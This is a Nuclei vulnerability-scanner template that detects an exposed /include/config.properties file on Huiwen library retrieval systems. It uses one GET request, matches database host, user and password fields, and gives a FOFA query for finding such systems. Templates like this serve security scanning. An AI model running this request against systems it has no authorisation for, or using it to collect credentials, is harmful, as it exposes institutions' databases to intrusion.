id: huiwen-bibliographic-info-leak

info:
  name: Huiwen library bibliographic Retrieval System - Information Exposure
  author: SleepingBag945
  severity: high
  description: |
    Huiwen library bibliographic retrieval system /include/config.properties file contains sensitive information, attackers can directly access to obtain information
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="汇文软件-书目检索系统"
  tags: huiwen,exposure,misconfig

http:
  - raw:
      - |
        GET /include/config.properties HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "host="
          - "port="
          - "user="
          - "password="
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201ba08579a9e6f8300bd345cdf79bc3e04c042791735418655096b45fe236dbc202200cd8bedc0b47d2ff66c53bcbdcbddfe209d73088a5f38ccd82032566ab19e37a:922c64590222798bb761d5b6d8e72950